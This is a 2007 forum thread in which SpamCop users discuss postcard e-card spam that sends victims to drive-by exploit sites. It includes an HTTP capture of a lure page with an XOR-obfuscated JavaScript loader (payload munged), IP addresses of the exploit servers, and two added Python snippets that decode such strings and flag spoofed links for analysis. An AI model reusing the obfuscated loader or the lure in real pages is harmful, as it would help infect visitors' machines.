Spam: "You have received a postcard..."


showker

Does anyone know if the current wave of "Postcard" spam contains potential dangerous .EXE content?

I note the links all go to a download site of an EXE file, but from a Mac, I cannot tell what the file is or does.

I do know the domains "blamed" are being spoofed (eg: Postcards.com), and that of the ones we're tracking, the servers are located in Egypt, Iran and Palestine -- suggesting terrorist activity.

Any knowledge on what those EXE files actually do?

Thanks

Fred

Hi Fred, the only reference I've seen just lately says the tricks are in the exploit site(s), no actual payload - Postcard spam contains links to a malicious Web site - but note
Hackers haven't abandoned the practice of attaching malware to e-mail, then counting on naive users to open the file, said Friedrichs. But malware hosting sites are the trend.
Anyway, the link contains details of the "Hydra-headed 'Storm' attack". They merely want to assimilate us.

Thank you for the response.

We are currently receiving 2 to 6 of these every 8 hours.

To "See" the postcard, they tell you to key the following IPs into the browser:

80.195.251.182

68.82.14.202

75.28.105.59

Since yesterday, there have been 16 different IP blocks referenced.

Today they seem to be repeating, starting over.

07/01/07 13:35:29 Browsing http://80.195.251.182/

Fetching http://80.195.251.182/ ...

GET / HTTP/1.1

Host: 80.195.251.182

Connection: close

HTTP/1.1 200 OK

Server: nginx/0.5.17

Date: Sun, 01 Jul 2007 18:30:47 GMT

Content-Type: text/html

Transfer-Encoding: chunked

X-Powered-By: PHP/5.2.1

6c3c

We are currently testing a new browser feature. If you are not able to view this ecard, please <a href="/ecard.exe">click here</a> to view in its original format.<div id="mydiv"></div><script Language='javascript'> function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } var plain_str = "<major mung of data>x2f\x4f\x40\x06\x0e\x07\x06\x6b\x62\x14\x65\x0e\x0f\x06\x0f\x06\x5d\x47\x54\x52\x0e\x0f\x1d\x2c"; var xored_str = xor_str(plain_str, 38); enum(xored_str); </script>

0

Content-Expire: 600

NOTE: data munged, and some actual content 'changed' during the post/display mode 'here'

The 'interesting' bit of the "please click here" crap is basically a distraction .... letting you read, think about clicking on the link, debating on whether that's a good idea or not ....

Yet, the 'magic' of this crap is that on an unprotected, insecure system, the javascript has actually already run and done its thing .... not saying that the .exe file does anything or even exists, just that by the time the average human 'reads' that text, whatever possible damage has already occurred.

For a bit of enlightenment on this storyline, there's an ancient SpamCop FAQ entry 'here' in the 'Other Places' section .. title includes the words "Follow the money" if I recall correctly ....

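As an added example, not code from this thread or from the ecard page: a small analyst's decoder for the xor_str pattern in the capture above. It pulls the numeric key and the \xNN string literal out of the HTML and reverses the XOR so the hidden script can be read without ever running it; the sample page and its encoded string are constructed, and the last few escapes of the string shown in the capture decode to `if (!` under key 38.

```python
import re

# Constructed sample, modelled on the captured ecard page above: the lure
# text and "click here" link, then a script that XOR-decodes a string and
# eval()s it. The encoded string here is a harmless placeholder, not the
# page's real payload.
SAMPLE_KEY = 38
SAMPLE_PLAIN = "document.write('decoded placeholder');"
SAMPLE_ENCODED = "".join("\\x%02x" % (ord(c) ^ SAMPLE_KEY) for c in SAMPLE_PLAIN)
SAMPLE_HTML = (
    "If you are not able to view this ecard, please "
    '<a href="/ecard.exe">click here</a><div id="mydiv"></div>'
    "<script Language='javascript'> function xor_str(plain_str, xor_key){"
    " var xored_str = ''; for (var i = 0; i < plain_str.length; ++i)"
    " xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));"
    " return xored_str; } var plain_str = \"" + SAMPLE_ENCODED + "\";"
    " var xored_str = xor_str(plain_str, 38); eval(xored_str); </script>"
)

# xor_str(<var>, <numeric key>) call, and the \xNN string literal assigned to <var>
XOR_CALL = re.compile(r"xor_str\(\s*(\w+)\s*,\s*(\d+)\s*\)")
STR_ASSIGN = r'var\s+%s\s*=\s*"((?:\\x[0-9a-fA-F]{2})+)"'


def decode_xor_string(encoded, key):
    """Undo xor_str(): parse the \\xNN escapes, then XOR every byte with the key."""
    raw = bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", encoded))
    return bytes(b ^ key for b in raw).decode("latin-1")


def find_xor_strings(html):
    """Return (variable, key, encoded literal) for each xor_str() call on the page."""
    found = []
    for var, key in XOR_CALL.findall(html):
        m = re.search(STR_ASSIGN % re.escape(var), html)
        if m:
            found.append((var, int(key), m.group(1)))
    return found


def decode_page(html):
    """Map each XOR-obfuscated variable on the page to its decoded source text."""
    return {var: decode_xor_string(enc, key) for var, key, enc in find_xor_strings(html)}


def looks_like_drive_by(html):
    """Heuristic: obfuscated script handed to eval() behind a 'click here' lure."""
    return bool(decode_page(html)) and re.search(r"\beval\s*\(", html) is not None


if __name__ == "__main__":
    for var, text in decode_page(SAMPLE_HTML).items():
        print("%s decodes to: %s" % (var, text))
    print("drive-by indicators present:", looks_like_drive_by(SAMPLE_HTML))
```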

For a bit of enlightenment on this storyline, there's an ancient SpamCop FAQ entry 'here' in the 'Other Places' section .. title includes the words "Follow the money" if I recall correctly ....
Nicely done, I didn't see the whole picture and had forgotten the previous discussion. Let's see - starting Spammers resort to new trick, trojan infected e-card with similar exposure of the script, several posts later, link to Follow the Money; or, why does my computer keep getting infested with spyware? and mention of your entry/link to same in the FAQ at http://forum.spamcop.net/forums/index.php?showtopic=2238 using the same "Follow the money ..." subtitle.

I already posted examples here of postcards from family and friends I have been getting 5-10 a day for the last couple of months or so, another trend is empty e-mails with pdf attachments, I don't open, of course...just report...

Don't know if they can even be classified as spam since they have a malicious, rather than simply annoying or for profit value.. coincidentally I just reported a couple..a minute ago

maybe someone can look at these safely, I am not taking chances

http://www.spamcop.net/sc?id=z1345199084za...182f804e858812z

http://www.spamcop.net/sc?id=z1345202265z0...14057b73169417z

First link is simply a stock spam, just using a PDF in place of the usual embedded JPG. Presumably the OCR spam filters have gotten too good at peeking inside JPGs, so the touts have resorted to this feint. The OCR filter people will now have to accelerate their development of PDF scanning.

Second link is an example of the "postcard" stuff discussed above. Standard "social engineering" pitch from badguys who want you to run their malware. I've gotten a few of these myself. I'm also a Mac user and can't read Wintel machine language, but I have to assume that this is not safe code to run.

-- rick

...of the "postcard" stuff discussed above. Standard "social engineering" pitch from badguys ...

Bad thing is most of my e-mail is also filtered by postini and only a few are identified as malware, here's one they defanged soon after my first post, this trojan even has postcard in the name..:

From: "PostcardsFrom.Com" <wind[at]ed.spb.ru>

Subject: You've received a postcard from a neighbour!

Virus: AUTH-HTML/Postcard.N[at]troj

  • 1 month later...

I checked out one of the "exploit link" type with ExpLabs linkscanner which revealed three exploits awaiting anyone following the link (which was http:// & 24.73.26.88). I reported this to abuse[at]rr.com with the linkscanner link (Check 24.73.26.88) - noticing as I researched but not mentioning to them that their IP address was also already on the SCBL as a spam source. A few hours later the exploit page was unreachable (as the link above may show - note it can't actually connect you to the website - when/if it is up - unless you do some more clicking). Haven't looked at how that IP address fared in the BL but (tentatively) there seems to be some point in manually reporting the exploit links, if the provider is half-way responsive. The linkscanner evidence should certainly be sufficient "evidence" of the provider's need to intervene.

I'm thinking the one address (even the one computer) might be part of several botnets (since in this case there was evidently a website host function and a mail sender function involved). When one worm finds another on the one computer they sometimes clear out the other but I don't know if, doubt that, this is universal behavior. Or maybe it's just the one botnet, being operated parsimoniously. The only real factor for the spamsufferer being that they are more visible and more vulnerable the more they do in terms of both/either volume and function.

  • 4 weeks later...

Last week we added a special malware spam section to our website after receiving a swarm of YouTube spam through our spam trap. These e-mails work exactly like the GreetingCard spam e-mails.

http://www.cybertopcops.com/malware-spam.php

Now I see spammers are using Labour Day greeting cards by spoofing the link with fake msn.com and google.com URLs. I've also seen similar e-mails using "new videos" released by Velvet Revolver, Eminem, Snoop Doggy and who knows what else as the bait.

All these e-mails contain the same characteristics: they link to a malicious site (IP addresses are normally used instead of domain names), they contain spoofed URLs (not always) and every e-mail uses a catchy bait to make you click on the links. All different, but still the same.

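An added example, not from the post above or its site, of checking a mail body for the traits just listed: links whose real target is a bare IP address, and links whose visible text names a different host than the href actually goes to. The sample mail and the 203.0.113.7 address are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample e-mail body, modelled on the "Labour Day card" mails
# described above: the visible text says msn.com, the real target is a bare IP.
SAMPLE_MAIL = """
<p>You have received a Labour Day greeting card!</p>
<p>To view it, click <a href="http://203.0.113.7/ecard.php">http://www.msn.com/cards/</a></p>
<p>Brought to you by <a href="http://www.example.org/">www.example.org</a></p>
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL; bare text like 'www.msn.com' is treated as a hostname too."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def classify_links(html):
    """Return (href, reasons) for every link showing the spoofing traits above."""
    parser = AnchorCollector()
    parser.feed(html)
    flagged = []
    for href, text in parser.links:
        reasons, target = [], host_of(href)
        if IPV4.match(target):
            reasons.append("href points at a bare IP address")
        # Only treat the anchor text as a host claim if it looks like a domain or URL.
        shown = host_of(text) if re.search(r"\.[a-z]{2,}", text, re.I) else ""
        if shown and shown != target:
            reasons.append("visible text names %s but href goes to %s" % (shown, target))
        if reasons:
            flagged.append((href, reasons))
    return flagged
```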

Thanks

All these e-mails contain the same characteristics: they link to a malicious site (IP addresses are normally used instead of domain names), they contain spoofed URLs (not always) and every e-mail uses a catchy bait to make you click on the links. All different, but still the same.
Indeed. And just to clarify, since a lot of people seem to think "clicking on the links" means clicking on the download link at the exploit site. No, clicking on the link (to me) means just going to the exploit site - that's all it takes if you have an exploitable system and very many people/the majority do. The "click here" on the target page is just to make you sit there long enough, smugly thinking "As if!" for the downloader program, silently and unbidden, to do its thing. Those who didn't know that are permitted some terrified screaming now.

And just to clarify, since a lot of people seem to think "clicking on the links" means clicking on the download link at the exploit site. No, clicking on the link (to me) means just going to the exploit site - that's all it takes if you have an exploitable system and very many people/the majority do.

For even further clarification, see Security issues beyond Windows .. which talks to all those "other" applications installed that also end up placing themselves into the Registry as an item that starts up right at boot time, therefore 'always' ready to spring into action when they are 'needed' ...
